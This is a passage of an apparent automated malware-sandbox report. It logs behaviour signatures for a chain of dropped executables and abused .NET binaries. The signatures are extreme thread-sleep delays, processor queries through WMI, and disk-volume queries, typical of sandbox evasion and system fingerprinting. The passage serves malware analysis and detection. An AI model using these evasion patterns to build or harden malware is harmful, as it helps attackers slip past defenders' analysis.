Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7500	Thread sleep time: -1848924s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7444	Thread sleep count: 988 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7444	Thread sleep time: -1976988s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2080	Thread sleep count: 920 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2080	Thread sleep time: -1840920s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 352	Thread sleep count: 1066 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 352	Thread sleep time: -2133066s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe TID: 3184	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7776	Thread sleep time: -20291418481080494s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2992	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe TID: 7588	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe TID: 728	Thread sleep time: -18446744073709540s >= -30000s
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe TID: 1532	Thread sleep count: 1389 > 30
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe TID: 1532	Thread sleep count: 3211 > 30
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe TID: 7628	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe TID: 6896	Thread sleep count: 9495 > 30
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe TID: 6896	Thread sleep time: -284850000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe TID: 4120	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe TID: 7924	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -598922s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -598756s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -598602s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -598422s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -598219s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -598038s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -597859s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -597656s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -597461s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -597334s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -597062s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -596406s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -596141s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -595891s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -595685s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -595406s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -595156s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -594906s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -594625s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -594359s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -593547s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -593281s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -593062s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -592719s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -592344s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -592016s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -591797s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -591578s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -590807s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -590547s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -590234s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -589969s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -589750s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -589516s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -589265s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -589031s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -588687s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -588266s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -587953s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -587719s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -587422s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -587203s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -586937s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -586687s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -585922s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -585672s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -585406s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -585094s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -584812s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -584547s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -584266s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -584016s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -583750s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -583516s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -583266s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -583047s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -582812s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -582516s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -582297s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -582094s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -581781s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -581484s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -581172s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -580875s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -580641s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -580328s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -580141s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -579922s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -579715s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -579453s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -579234s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -578984s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -578766s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -578516s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -578312s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -578031s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -577828s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -577609s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -577375s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -577141s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -576913s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -576687s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -576484s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -576234s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -576000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -575797s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -575547s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -575312s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -575093s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -574797s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -574594s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -574312s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -574078s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -573844s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -573547s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -572797s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -572547s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -572328s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -572141s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -571922s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -571672s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -571469s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -571203s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -570922s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -570109s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -569875s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -569625s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -569328s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -569094s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -568948s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -568774s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -568531s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -568328s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -568094s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -567344s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -567141s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -566955s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -566750s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -566531s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -566344s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -566156s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -565922s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -565703s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -565496s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -565291s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -564562s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -564342s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -564094s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -563844s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -563641s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -563500s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -563281s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -563047s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -562844s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -562680s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -562491s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -562281s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -562078s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -561844s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -561562s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -561391s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -561203s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -561016s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -560812s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -560623s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -560391s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -559687s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -559500s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -559312s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -559060s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -558828s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -558625s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -558451s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -558203s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -557982s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -557750s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -557047s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -556687s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -556481s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -556312s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -556139s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -555966s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -555777s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -555547s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -555297s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -555109s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -554906s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -554641s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -554078s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -553859s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -553625s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -553422s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -553234s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -553047s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -552859s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -552672s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -552468s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -552266s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -552047s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -551797s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe TID: 872	Thread sleep time: -551266s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe TID: 8008	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe TID: 1516	Thread sleep time: -354000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe TID: 6528	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe TID: 7404	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5824	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 364	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : Select Name from Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 16_2_0041B6EA FindFirstFileExW,

16_2_0041B6EA

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 598922
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 598756
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 598602
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 598422
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 598219
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 598038
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 597859
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 597656
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 597461
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 597334
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 597062
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 596406
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 596141
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 595891
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 595685
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 595406
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 595156
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 594906
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 594625
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 594359
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 593547
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 593281
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 593062
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 592719
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 592344
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 592016
